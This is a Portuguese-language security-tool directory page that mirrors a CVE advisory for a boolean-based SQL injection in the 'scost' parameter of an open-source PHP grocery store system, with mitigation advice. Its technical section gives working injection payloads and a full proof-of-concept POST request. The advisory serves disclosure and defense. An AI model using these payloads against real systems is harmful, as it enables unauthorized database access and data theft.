Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-37149 — CVE-2026-37149 - Vulnerabilidade de injeção de SQL no parâmetro scost de search_products.php no GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0. | Kitploit
Ferramentas/GitHubGitHub/pateldhyeyit/cve-2026-37149
Análise de VulnerabilidadesExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoAprendizado e EducaçãoSegurança de Banco de Dados
GitHubpateldhyeyit/cve-2026-37149

CVE-2026-37149

CVE-2026-37149 - Vulnerabilidade de injeção de SQL no parâmetro scost de search_products.php no GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0.

Ver Repositório
22há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-37149 Injeção de SQL em GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0

Resumo

ID CVE: CVE-2026-37149 Tipo de Vulnerabilidade: Injeção de SQL (CWE-89) Severidade: Alta Descobridor: Dhyey Patel

Descrição

O GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 contém uma vulnerabilidade de Injeção de SQL no parâmetro "scost" de "/grocery/search_products.php".

A aplicação não valida adequadamente a entrada fornecida pelo usuário antes de inseri-la em consultas SQL. Um atacante pode injetar expressões SQL maliciosas por meio do parâmetro vulnerável e manipular consultas no banco de dados subjacente.

A exploração bem-sucedida pode permitir acesso não autorizado a informações sensíveis do banco de dados e a execução de instruções SQL arbitrárias.

Produto Afetado

Produto: GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN

Versão: v1.0

Repositório do Fornecedor:

https://github.com/anirudhkannanvp/GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN-

Componente Afetado

  • "/grocery/search_products.php"
  • Parâmetro POST: "scost"

Tipo de Ataque Remoto

Informações do Fornecedor Projeto de código aberto mantido pelo proprietário do repositório: https://github.com/anirudhkannanvp

Detalhes Técnicos

A vulnerabilidade foi confirmada usando técnicas de Injeção de SQL baseada em Booleano.

Payload com Condição VERDADEIRA

-1 OR 321=6 AND 000483=000483 --

Payload com Condição FALSA

-1 OR 320=6 AND 000483=000483 --

As respostas da aplicação diferiram com base em a condição injetada ser avaliada como VERDADEIRA ou FALSA, confirmando a Injeção de SQL.

Testes adicionais confirmaram a execução bem-sucedida de funções SQL, incluindo:

SELECT database()

O nome do banco de dados retornado foi:

grocery

Isso demonstra que consultas SQL arbitrárias podem ser executadas por meio do parâmetro vulnerável.

Prova de Conceito

Requisição

POST /grocery/search_products.php HTTP/1.1 Host: localhost X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded

scategory=1& scost=-1 OR 321=6 AND 000483=000483 -- & sitem_name=test& spid=1& submit=Search%20For%20products

Resultado

A resposta muda de acordo com a condição Booleana injetada, confirmando a Injeção de SQL no parâmetro "scost".

Impacto

Os impactos potenciais incluem:

  • Enumeração de Banco de Dados
  • Divulgação de Informações Sensíveis
  • Bypass de Autenticação
  • Extração de Dados
  • Modificação de Registros do Banco de Dados

Mitigação

Os desenvolvedores devem:

  1. Usar prepared statements.
  2. Usar consultas SQL parametrizadas.
  3. Validar parâmetros de entrada numéricos.
  4. Implementar validação de entrada no lado do servidor.
  5. Evitar a concatenação direta de entrada controlada pelo usuário em instruções SQL.

Referências OWASP SQL Injection https://owasp.org/www-community/attacks/SQL_Injection

MITRE CVE Program https://www.cve.org

Créditos Descoberto e reportado por: Dhyey Patel

Baixar ferramenta